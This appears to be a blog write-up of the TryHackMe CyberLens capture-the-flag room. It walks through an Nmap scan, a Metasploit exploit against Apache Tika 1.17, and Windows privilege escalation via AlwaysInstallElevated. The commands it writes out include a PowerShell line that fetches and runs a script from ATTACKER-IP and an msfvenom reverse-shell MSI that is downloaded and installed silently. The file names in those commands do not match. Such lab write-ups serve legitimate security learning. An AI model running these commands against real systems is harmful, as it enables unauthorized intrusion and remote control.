Windows Privilege Escalation with Metasploit | TryHackMe CyberLens CTF

Windows Privilege Escalation with Metasploit | TryHackMe CyberLens CTF

We covered a very easy penetration testing challenge where we started with an Nmap scan followed by web enumeration then we found out a vulenrability in Apache Tika version 1.17 for which a ready and available exploit is found in Metasploit.

Using Metasploit, the vulnerability was exploited, initial access was obtained and privileges were escalated on the Windows machine after running the exploit suggester and finding that AlwaysInstallElevated is enabled. This was part of TryHackMe CyberLens CTF.

Task Scenario

Welcome to the clandestine world of CyberLens, where shadows dance amidst the digital domain and metadata reveals the secrets that lie concealed within every image. As you embark on this thrilling journey, prepare to unveil the hidden matrix of information that lurks beneath the surface, for here at CyberLens, we make metadata our playground.

In this labyrinthine realm of cyber security, we have mastered the arcane arts of digital forensics and image analysis. Armed with advanced techniques and cutting-edge tools, we delve into the very fabric of digital images, peeling back layers of information to expose the unseen stories they yearn to tell.

Picture yourself as a modern-day investigator, equipped not only with technical prowess but also with a keen eye for detail. Our team of elite experts will guide you through the intricate paths of image analysis, where file structures and data patterns provide valuable insights into the origins and nature of digital artifacts.

At CyberLens, we believe that every pixel holds a story, and it is our mission to decipher those stories and extract the truth. Join us on this exciting adventure as we navigate the digital landscape and uncover the hidden narratives that await us at every turn.

Can you exploit the CyberLens web server and discover the hidden flags?

Highlights

Nmap scanning output

─# nmap -A 10.10.189.206 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 09:40 EDT
Nmap scan report for cyberlens.thm (10.10.189.206)
Host is up (0.10s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Apache httpd 2.4.57 ((Win64))
|_http-server-header: Apache/2.4.57 (Win64)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: CyberLens: Unveiling the Hidden Matrix
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2024-05-17T13:10:13
|_Not valid after:  2024-11-16T13:10:13
| rdp-ntlm-info: 
|   Target_Name: CYBERLENS
|   NetBIOS_Domain_Name: CYBERLENS
|   NetBIOS_Computer_Name: CYBERLENS
|   DNS_Domain_Name: CyberLens
|   DNS_Computer_Name: CyberLens
|   Product_Version: 10.0.17763
|_  System_Time: 2024-05-18T13:47:39+00:00
|_ssl-date: 2024-05-18T13:47:47+00:00; -10s from scanner time.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7)... redacted ...        
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| smb2-time: 
|   date: 2024-05-18T13:47:41
|_  start_date: N/A
|_clock-skew: mean: -10s, deviation: 0s, median: -10s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not requiredTRACEROUTE (using port 587/tcp)
HOP RTT       ADDRESS
1   125.60 ms 10.9.0.1
2   121.35 ms cyberlens.thm (10.10.189.206)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 464.64 seconds        

Exploiting Windows using Metasploit

According to the enumeration, the service running on port 61777 is Apache Tika 1.17 which happens to be vulnerable.

Below is the right module for this vulnerability:

msf > use exploit/windows/http/apache_tika_jp2_jscript
msf exploit(apache_tika_jp2_jscript) > show targets
    ...targets...
msf exploit(apache_tika_jp2_jscript) > set TARGET < target-id >
msf exploit(apache_tika_jp2_jscript) > show options
    ...show and set options...
msf exploit(apache_tika_jp2_jscript) > exploit        

Module Description from Rapid7:

This module exploits a command injection vulnerability in Apache Tika 1.15–1.17 on Windows. A file with the image/jp2 content-type is used to bypass magic bytes checking. When OCR is specified in the request, parameters can be passed to change the parameters passed at command line to allow for arbitrary JScript to execute. A JScript stub is passed to execute arbitrary code. This module was verified against version 1.15–1.17 on Windows 2012. While the CVE and finding show more versions vulnerable, during testing it was determined only > 1.14 was exploitable due to jp2 support being added.

Downloading and Executing Powerup script to perform Windows privilege escalation

# target machine
iex (iwr -usebasicparsing https://ATTACKER-IP/PowerUp.ps1)        
PS C:\Users\CyberLens\Desktop\invoke-allchecks        

Generating and executing an MSI payload using Msfvenom

# attacker machine
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER-IP LPORT=4546 -f msi > shell.msi        
# target machine
wget https://ATTACKER-IP/payload.msi -o payload.msi
msiexec /quiet /qn /i C:\temp\shell.msi        

Room Answers

Room answers can be found here.

Video Walkthrough | TryHackMe CyberLens CTF


要查看或添加评论,请登录

社区洞察

其他会员也浏览了